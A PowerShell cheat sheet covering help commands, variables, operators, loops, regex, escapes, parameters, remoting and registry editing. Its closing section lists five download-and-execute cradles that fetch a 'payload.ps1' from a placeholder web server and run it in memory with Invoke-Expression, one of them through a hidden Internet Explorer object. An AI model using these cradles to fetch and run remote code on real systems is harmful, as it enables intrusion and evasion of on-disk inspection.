Powershell Cheat Sheet

Powershell Useful Commands

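# Run PowerShell elevated (Start-Process with the RunAs verb requests administrator privileges)
Start-Process PowerShell -Verb RunAs

# PowerShell help for a cmdlet
Get-Help <cmdlet>
#   ex: Get-Help Get-Process
#   ex: Get-Help Get-Process -Examples

# Update the local help files (the original 'Update - Help' has stray spaces and is not a valid cmdlet name)
Update-Help

# List all commands and functions available in the session
Get-Command

# List every property of a process
Get-Process -Name <processName> | Format-List -Property *

# Recurse a directory and list only the matching child items
# (-Recurse is needed for the recursion the heading promises; -Include filters by name)
Get-ChildItem -Path C:\ -Recurse -Include *.txt

# Show the current script execution policy
Get-ExecutionPolicy

# List all functions defined in the session (Function: is a provider drive)
Get-ChildItem Function: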

Powershell Variable

# Set Variable and Variable Type
# Without a cast, the variable takes the type of the value assigned to it.
$a = "String" #String
$a = 4 #Integer

# A cast in front of the name constrains the variable to that type;
# [int] is the shorthand for the .NET type [System.Int32].
[int]$a = 4
[System.Int32]$a = 4

# Common data type shortcuts
[datetime]
[string]
[char]
[double]
[int]
[boolean]

Comparison Operators

-eq Equal to (=)
-lt Less than (<)
-gt Greater than (>)
-ge Greater than or equal (>=)
-le Less than or equal (<=)
-ne Not equal to (!=)

Logical Operators

-not Not
! Not
-and And
-or Or
-is Is of type
-isnot Is not of type
-as Convert to type
-xor Exclusive or

If Statements

if (condition) {run this code block}
elseif (condition) {run this code block}
else {run this code block}

For Each Loop

# An array of four integers to iterate over
$a = 5,6,7,8

# 1. Usage: pipeline form. ForEach here is the alias of ForEach-Object
#    and $_ is the item currently coming through the pipeline.
$a | ForEach {write-host $_}

# 2. Usage: statement form. $value is bound to each element in turn.
ForEach ($value in $a)
{write-host $value}

For Loop

# Counted loop: initialise, test, increment. Prints 1, 2 and 3, one per line.
for ($i = 1; $i -le 3; $i++) {
  Write-Host $i
}

Do While Loop

$a = 1
# do/while runs the body before the condition is evaluated, so 1 is
# printed once; with $a already 1, 'while ($a -lt 0)' is false on the
# first check and the loop ends there.
do {write-host $a; $a++}
while ($a -lt 0)

Regex

. (period) - matches a single character
[aeiou] - matches a single character from those specified within the brackets
[b-f] - matches a single character within the specified range
[^bcdef] - matches any character except those within the brackets
^ - matches characters located at the beginning of a string
$ - matches character located at the end of a string
* - matches zero or more occurrences of the preceding character
? - matches zero or one occurrence of the preceding character
\\ - matches the character following the escape (\\) character
# Regular Expression Qualifiers
* - must match zero or more times
+ - must match one or more times
? - must match zero or one time
{n} - must match n times
{n,} - must match at least n times
{n,m} - must match at least n times, but not more than m times
# Regular Expression Shortcuts
\\d - matches any decimal digit, same as [0-9]
\\w - matches any word character, same as [0-9A-Za-z_]
\\D - matches any non-digit
\\W - matches any non-word character such as space
\\S - matches any non-whitespace character

Powershell Escape Character

# Escape Character
` - at the end of a command line to continue the command on the next line
`$ - to include a $ in the output
`0 - means NULL ($null is preferred)
`a - makes an Alert sound
`b - means backspace
`f - means formfeed (only affects printed documents)
`n - means new line
`r - means carriage return
`t - means horizontal tab
`v - means vertical tab (only affects printed documents)
`' - means single quote

Powershell Parameters

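# Script parameters: $username is a required string. If it is omitted on the
# command line, PowerShell prompts for it before the script body runs.
# (The attribute property is spelled Mandatory; 'Mendatory' is rejected by the parser.)
Param(
  [Parameter(Mandatory=$true)]
  [string]$username
)

$a = $username
Write-Host "Hello $a"

# Command line:        .\example.ps1 Kyyyle
# Command line output: Hello Kyyyle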

Powershell Remote Computer Sessions

# Create Session: opens a persistent session to the remote computer. Passing a
# user name string to -Credential makes PowerShell prompt for the password
# rather than taking it from the command line.
New-PSSession -ComputerName <computername> -Credential <domain name>\\<domain user>

# Get Sessions: lists the open sessions together with the Id used below
Get-PSSession

# Login Session: attach interactively to an existing session by its Id
Enter-PSSession -id <Session ID>

# Enable Powershell Remoting: run on the machine that will accept sessions.
# It configures the WinRM service and listener; -Force suppresses the confirmation prompts.
Enable-PSRemoting -Force

Running Commands on a Remote Machine with Powershell

# Remote Code Execution on the Remote Machine: the script block runs on
# <computerName> under the supplied credential and its output is returned
# to the local session.
Invoke-Command -ScriptBlock {whoami; (Get-Host).version; Get-Process} -ComputerName <computerName> -Credential <domainName>\\<domainUserName>

# Remote File Execution on the Remote Machine: the .ps1 file is read from the
# local machine and its contents are executed on <computerName>.
Invoke-Command -FilePath <Powershell File> -ComputerName <computerName> -Credential <domainName>\\<domainUserName>

Powershell Registry

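# Get the Registry provider and the drives it exposes (HKLM: and HKCU:).
# The provider name is 'Registry'; the misspelling 'Registery' is not a provider and fails.
Get-PSProvider -PSProvider Registry

# Get a registry key. Get-Item returns the key itself; use Get-ItemProperty
# on the same path to read the values stored under it.
Get-Item 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'

# Access the Registry provider directly (reaches hives that have no drive letter)
Set-Location Registry::

# Add a new key in the Registry
New-Item -Path <Path>
# ex : New-Item -Path HKCU:\Test

# Add a value to a key
New-ItemProperty -Path <path> -Name <Property Name> -PropertyType <property type> -Value <value>
# ex : New-ItemProperty -Path HKCU:\Test -Name Reg2 -PropertyType String -Value 1

# Rename a key in the Registry
Rename-Item -Path <Old Path> -NewName <new name>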

Powershell File Download Example

# Every example below fetches script text from a URL and passes it straight to
# Invoke-Expression (iex), so the script runs in memory without being written
# to disk. On a monitored host this download-and-execute pattern is exactly what
# PowerShell script block logging and AMSI inspection are built to surface.
# Examples 2-5 fetch over plain http, so the content arrives unauthenticated.

# 1. Example: WebClient.DownloadString
iex (New-Object New.WebClient).DownloadString('<https://webserver/paylaod.ps1>')

# 2. Example: drive an Internet Explorer COM object with visible=$False and
#    read the page body after a fixed 5-second wait
$ie=New-Object -ComObject
InternetExplorer.Application; $ie.visible=$False; $ie.navigate('<http://webserver/payload.ps1>'); sleep 5; $response=$ie.Document.body.innerHTML; $ie.quit(); iex $response

# 3. Example (PSv3 onwards): Invoke-WebRequest (iwr)
iex (iwr '<http://webserver/payload.ps1>')

# 4. Example: synchronous GET through the MSXML XMLHTTP COM object
$h=New-Object -ComObject
Msxml2.XMLHTTP; $h.open('GET','<http://webserver/payload.ps1>',$false);$h.send();iex
$h.responseText

# 5. Example: .NET WebRequest, reading the response stream to the end
$wr = [System.NET.WebRequest]::Create("<http://webserver/payload.ps1>")
$r = $wr.GetResponse()
IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()